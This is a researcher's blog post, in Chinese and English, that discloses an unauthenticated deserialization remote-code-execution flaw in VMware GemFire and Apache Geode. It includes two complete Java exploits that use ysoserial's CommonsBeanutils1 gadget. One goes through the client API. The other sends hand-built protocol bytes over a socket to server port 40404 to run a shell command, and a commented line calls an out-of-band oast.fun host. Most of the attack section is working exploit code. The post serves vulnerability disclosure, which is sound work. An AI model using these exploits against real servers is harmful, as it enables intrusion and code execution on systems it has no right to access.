官方在文档上加了提示 https://docs.vmware.com/en/VMware-GemFire/10.0/gf/managing-security-hardening-guide.html 公开此漏洞
该漏洞是我在挖掘VMware vROPS产品中发现的反序列化漏洞,但是在VMware vROPS产品中并不能直接利用,因为该产品开启了ssl并且开启了双向认证,必须有ssl的证书才可以反序列化。这里先记录一下未开启ssl的反序列化RCE。
Unauthorized deserialization exists in gemfire, and attackers can construct malicious deserialized data to execute code on the target machine.
vmware-gemfire-9.15.2.tar.gz from https://network.tanzu.vmware.com/products/pivotal-gemfire/
or apache geode from github
1
2
3
| .\gfsh.bat
start locator --name=locator1
start server --name=server1
|
locator port 10334 server port 40404
Import ysoserial-all.jar in dependencies
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| import com.vmware.vcops.platform.api.PlatformException;
import org.apache.geode.cache.Region;
import org.apache.geode.cache.client.ClientCache;
import org.apache.geode.cache.client.ClientCacheFactory;
import org.apache.geode.cache.client.ClientRegionShortcut;
import ysoserial.payloads.CommonsBeanutils1;
public class Main {
public static void main(String[] args) throws Exception, PlatformException {
ClientCache cache = new ClientCacheFactory().addPoolLocator("127.0.0.1", 10334).set("log-level", "NONE").create();
Region<Object, Object> region = cache.createClientRegionFactory(ClientRegionShortcut.PROXY).create("example");
Object object = new CommonsBeanutils1().getObject("notepad");
region. put(object, object);
}
}
|
The malicious deserialized object “object” will be deserialized when sent to the server with port 40404, thus executing the notepad command.
or use this port send serialize data to port 40404
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| import ysoserial.Serializer;
import ysoserial.payloads.CommonsBeanutils1;
import java.io.DataOutputStream;
import java.io.OutputStream;
import java.io.Serializable;
import java.net.Socket;
public class SocketTest {
public static void main(String[] args) throws Exception {
String host = "192.168.1.166";
Socket client = new Socket(host, 40404);
OutputStream outputStream = client.getOutputStream();
// CommunicationMode 0x64=100=ClientToServer
outputStream.write(0x64);
// version 255 0 150
outputStream.write(0xff);
outputStream.write(0x0);
outputStream.write(0x96);
// valRead REPLY_OK
outputStream.write(0x3b);
DataOutputStream dataOutputStream = new DataOutputStream(outputStream);
// timeout
dataOutputStream.writeInt(10000);
// DSCODE SERIALIZABLE
dataOutputStream.write(0x2c);
Serializable notepad = (Serializable) new CommonsBeanutils1().getObject("touch /tmp/fuck" + System.currentTimeMillis());
// Serializable notepad = (Serializable) new URLDNS().getObject("http://" + System.currentTimeMillis() +"."+host+ ".cfj4rxv2vtc0000y0xngg83ncqhyyyyyb.oast.fun");
dataOutputStream.write(Serializer.serialize(notepad));
dataOutputStream.flush();
dataOutputStream.close();
outputStream.flush();
outputStream.close();
client.close();
}
}
|
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。